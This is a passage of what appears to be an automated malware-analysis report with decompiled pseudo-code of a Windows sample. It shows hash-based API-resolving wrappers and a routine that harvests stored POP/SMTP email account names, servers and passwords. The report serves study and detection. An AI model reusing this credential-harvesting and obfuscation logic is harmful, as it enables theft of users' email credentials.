                          • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C08(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                          				_t4 = DeleteFileW(_a4); // executed
                          				return _t4;
                          			}





                          0x00403c15
                          0x00403c1d
                          0x00403c20

                          APIs
                          • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0
                          • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                          • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402C1F(WCHAR* _a4) {
                          				struct HINSTANCE__* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                          				_t4 = LoadLibraryW(_a4); // executed
                          				return _t4;
                          			}





                          0x00402c2c
                          0x00402c34
                          0x00402c37

                          APIs
                          • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                          • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BEF(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                          				_t4 = FindClose(_a4); // executed
                          				return _t4;
                          			}





                          0x00403bfc
                          0x00403c04
                          0x00403c07

                          APIs
                          • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                          • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BB7(WCHAR* _a4) {
                          				long _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                          				_t4 = GetFileAttributesW(_a4); // executed
                          				return _t4;
                          			}





                          0x00403bc4
                          0x00403bcc
                          0x00403bcf

                          APIs
                          • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                          • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004049FF(void* _a4) {
                          				long _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                          				_t3 = RegCloseKey(_a4); // executed
                          				return _t3;
                          			}





                          0x00404a0d
                          0x00404a15
                          0x00404a18

                          APIs
                          • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                          • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403B64(WCHAR* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                          				_t3 = PathFileExistsW(_a4); // executed
                          				return _t3;
                          			}





                          0x00403b72
                          0x00403b7a
                          0x00403b7d

                          APIs
                          • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID:
                          • API String ID: 1174141254-0
                          • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                          • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403F9E(void* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                          				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                          				return _t3;
                          			}





                          0x00403fac
                          0x00403fba
                          0x00403fbe

                          APIs
                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                          • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406472(long _a4) {
                          				void* _t3;
                          				void* _t4;
                          
                          				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                          				Sleep(_a4); // executed
                          				return _t3;
                          			}





                          0x0040647f
                          0x00406487
                          0x0040648a

                          APIs
                          • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                          • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004058EA(char* _a4, char* _a8) {
                          				char* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                          				_t4 = StrStrA(_a4, _a8); // executed
                          				return _t4;
                          			}





                          0x004058f8
                          0x00405903
                          0x00405906

                          APIs
                          • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                          • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                          • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                          • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405924(WCHAR* _a4, WCHAR* _a8) {
                          				WCHAR* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                          				_t4 = StrStrW(_a4, _a8); // executed
                          				return _t4;
                          			}





                          0x00405932
                          0x0040593d
                          0x00405940

                          APIs
                          • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                          • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                          • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                          • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040438F
                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                          • VariantInit.OLEAUT32(?), ref: 004043C4
                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                          • VariantInit.OLEAUT32(?), ref: 00404414
                          • SysAllocString.OLEAUT32(?), ref: 00404419
                          • VariantInit.OLEAUT32(?), ref: 00404431
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                          • String ID:
                          • API String ID: 1312198159-0
                          • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                          • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t40;
                          				intOrPtr _t45;
                          				intOrPtr _t47;
                          				void* _t71;
                          				void* _t75;
                          				void* _t77;
                          
                          				_t72 = _a4;
                          				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                          				_t81 = _t71;
                          				if(_t71 != 0) {
                          					_push(__ebx);
                          					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                          					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                          					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                          					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                          					_v8 = _v8 & 0x00000000;
                          					_v20 = _t40;
                          					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                          					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                          					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                          					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                          					_v12 = _v12 & 0x00000000;
                          					_v32 = _t45;
                          					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                          					_t77 = _t75 + 0x50;
                          					_v36 = _t47;
                          					if(_v8 != 0 || _v12 != 0) {
                          						E00405872( *0x49f934, _t71, 1, 0);
                          						E00405872( *0x49f934, _t67, 1, 0);
                          						_t74 = _v16;
                          						E00405872( *0x49f934, _v16, 1, 0);
                          						E00405781( *0x49f934, _v40);
                          						E00405872( *0x49f934, _v20, 1, 0);
                          						_push(_v8);
                          						E00405762(_v16,  *0x49f934, _v24);
                          						E00405872( *0x49f934, _v28, 1, 0);
                          						E00405781( *0x49f934, _v44);
                          						E00405872( *0x49f934, _v32, 1, 0);
                          						_push(_v12);
                          						E00405762(_t74,  *0x49f934, _v36);
                          						_t77 = _t77 + 0x88;
                          					} else {
                          						_t74 = _v16;
                          					}
                          					E0040471C(_t71);
                          					E0040471C(_t67);
                          					E0040471C(_t74);
                          					E0040471C(_v20);
                          					E0040471C(_v24);
                          					E0040471C(_v28);
                          					E0040471C(_v32);
                          					E0040471C(_v36);
                          				}
                          				return 1;
                          			}





















                          0x0040d070
                          0x0040d080
                          0x0040d084
                          0x0040d086
                          0x0040d08c
                          0x0040d0a0
                          0x0040d0ae
                          0x0040d0bd
                          0x0040d0c0
                          0x0040d0c5
                          0x0040d0c9
                          0x0040d0e3
                          0x0040d0f2
                          0x0040d101
                          0x0040d104
                          0x0040d109
                          0x0040d110
                          0x0040d11e
                          0x0040d123
                          0x0040d126
                          0x0040d12d
                          0x0040d145
                          0x0040d154
                          0x0040d15a
                          0x0040d166
                          0x0040d174
                          0x0040d186
                          0x0040d18e
                          0x0040d19a
                          0x0040d1ac
                          0x0040d1ba
                          0x0040d1cc
                          0x0040d1d1
                          0x0040d1dd
                          0x0040d1e2
                          0x0040d1e7
                          0x0040d1e7
                          0x0040d1e7
                          0x0040d1eb
                          0x0040d1f1
                          0x0040d1f7
                          0x0040d1ff
                          0x0040d207
                          0x0040d20f
                          0x0040d217
                          0x0040d21f
                          0x0040d227
                          0x0040d230

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                          • API String ID: 0-2111798378
                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: recv
                          • String ID:
                          • API String ID: 1507349165-0
                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040549C(signed int _a4, signed int* _a8) {
                          				signed int* _t46;
                          				void* _t47;
                          				signed int* _t48;
                          				signed int* _t49;
                          				signed int* _t50;
                          				signed int* _t51;
                          				signed int* _t52;
                          				signed int* _t53;
                          				signed int* _t55;
                          				signed int* _t57;
                          				signed int _t59;
                          				signed int _t61;
                          				signed int _t62;
                          				unsigned int _t64;
                          				signed int _t77;
                          				signed int _t79;
                          				signed int _t81;
                          				signed int _t95;
                          				signed int _t97;
                          				signed int _t98;
                          				signed int _t100;
                          				signed int _t102;
                          				signed char* _t124;
                          
                          				_t124 = _a4;
                          				_t59 =  *_t124 & 0x000000ff;
                          				if(_t59 >= 0) {
                          					_t57 = _a8;
                          					_t57[1] = _t57[1] & 0x00000000;
                          					 *_t57 = _t59;
                          					return 1;
                          				}
                          				_t95 = _t124[1] & 0x000000ff;
                          				if(_t95 >= 0) {
                          					_t55 = _a8;
                          					_t55[1] = _t55[1] & 0x00000000;
                          					 *_t55 = (_t59 & 0x0000007f) << 0x00000007 | _t95;
                          					return 2;
                          				}
                          				_t61 = _t59 << 0x0000000e | _t124[2] & 0x000000ff;
                          				if(_t61 < 0) {
                          					_t97 = _t95 << 0x0000000e | _t124[3] & 0x000000ff;
                          					_t62 = _t61 & 0x001fc07f;
                          					if(_t97 < 0) {
                          						_t98 = _t97 & 0x001fc07f;
                          						_t77 = _t62 << 0x0000000e | _t124[4] & 0x000000ff;
                          						if(_t77 < 0) {
                          							_t64 = _t62 << 0x00000007 | _t98;
                          							_t100 = _t98 << 0x0000000e | _t124[5] & 0x000000ff;
                          							if(_t100 < 0) {
                          								_t79 = _t77 << 0x0000000e | _t124[6] & 0x000000ff;
                          								if(_t79 < 0) {
                          									_t102 = _t100 << 0x0000000e | _t124[7] & 0x000000ff;
                          									_t81 = (_t79 & 0x001fc07f) << 7;
                          									if(_t102 < 0) {
                          										_t46 = _a8;
                          										 *_t46 = (_t102 & 0x001fc07f | _t81) << 0x00000008 | _t124[8] & 0x000000ff;
                          										_t46[1] = (_t124[4] & 0x000000ff) >> 0x00000003 & 0x0000000f | _t64 << 0x00000004;
                          										_t47 = 9;
                          									} else {
                          										_t48 = _a8;
                          										 *_t48 = _t102 & 0xf01fc07f | _t81;
                          										_t48[1] = _t64 >> 4;
                          										_t47 = 8;
                          									}
                          								} else {
                          									_t49 = _a8;
                          									 *_t49 = (_t100 << 0x00000007 ^ _t79) & 0x0fe03f80 ^ _t79;
                          									_t49[1] = _t64 >> 0xb;
                          									_t47 = 7;
                          								}
                          							} else {
                          								_t50 = _a8;
                          								_a4 = (_t77 & 0x001fc07f) << 0x00000007 | _t100;
                          								 *_t50 = _a4;
                          								_t50[1] = _t64 >> 0x12;
                          								_t47 = 6;
                          							}
                          						} else {
                          							_t51 = _a8;
                          							 *_t51 = _t98 << 0x00000007 | _t77;
                          							_t51[1] = _t62 >> 0x12;
                          							_t47 = 5;
                          						}
                          					} else {
                          						_t52 = _a8;
                          						_t52[1] = _t52[1] & 0x00000000;
                          						 *_t52 = _t97 & 0x001fc07f | _t62 << 0x00000007;
                          						_t47 = 4;
                          					}
                          					return _t47;
                          				} else {
                          					_t53 = _a8;
                          					_t53[1] = _t53[1] & 0x00000000;
                          					 *_t53 = (_t95 & 0x0000007f) << 0x00000007 | _t61 & 0x001fc07f;
                          					return 3;
                          				}
                          			}


























                          0x004054a1
                          0x004054a4
                          0x004054a9
                          0x004054ab
                          0x004054ae
                          0x004054b2
                          0x00000000
                          0x004054b4
                          0x004054bb
                          0x004054c1
                          0x004054c3
                          0x004054ce
                          0x004054d2
                          0x00000000
                          0x004054d4
                          0x004054e2
                          0x004054e6
                          0x00405513
                          0x00405515
                          0x00405519
                          0x0040553b
                          0x0040553d
                          0x00405541
                          0x00405565
                          0x0040556a
                          0x0040556e
                          0x0040559a
                          0x0040559e
                          0x004055c9
                          0x004055cb
                          0x004055d0
                          0x0040560d
                          0x00405610
                          0x00405612
                          0x00405615
                          0x004055d2
                          0x004055d2
                          0x004055e4
                          0x004055e6
                          0x004055e9
                          0x004055e9
                          0x004055a0
                          0x004055a0
                          0x004055b7
                          0x004055b9
                          0x004055bc
                          0x004055bc
                          0x00405570
                          0x00405570
                          0x0040557d
                          0x00405587
                          0x00405589
                          0x0040558c
                          0x0040558c
                          0x00405543
                          0x00405543
                          0x00405552
                          0x00405554
                          0x00405557
                          0x00405557
                          0x0040551b
                          0x0040551b
                          0x00405525
                          0x00405529
                          0x0040552b
                          0x0040552b
                          0x00000000
                          0x004054e8
                          0x004054e8
                          0x004054f9
                          0x004054fd
                          0x00000000
                          0x004054ff

                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                          • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                          • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                          • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E004029D4(signed int _a28, signed int _a36, unsigned int _a40) {
                          				signed int _t26;
                          				signed int _t27;
                          				signed int _t28;
                          				signed int _t39;
                          				signed int _t47;
                          				unsigned int _t69;
                          				unsigned int _t70;
                          				signed int _t71;
                          				signed int _t73;
                          				signed int _t75;
                          				signed int* _t76;
                          
                          				asm("pushad");
                          				_t75 = _a36;
                          				_t69 = _a40;
                          				_t26 = 0;
                          				if(_t75 != 0) {
                          					_t27 = 0xffffffffffffffff;
                          					if(_t69 != 0) {
                          						while((_t75 & 0x00000003) != 0) {
                          							_t47 = _t27 ^  *_t75;
                          							_t75 = _t75 + 1;
                          							_t27 = _t47 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t47) * 4);
                          							_t69 = _t69 - 1;
                          							if(_t69 != 0) {
                          								continue;
                          							}
                          							break;
                          						}
                          						_t73 = _t69 & 0x00000007;
                          						_t70 = _t69 >> 3;
                          						while(_t70 != 0) {
                          							_t76 = _t75 + 4;
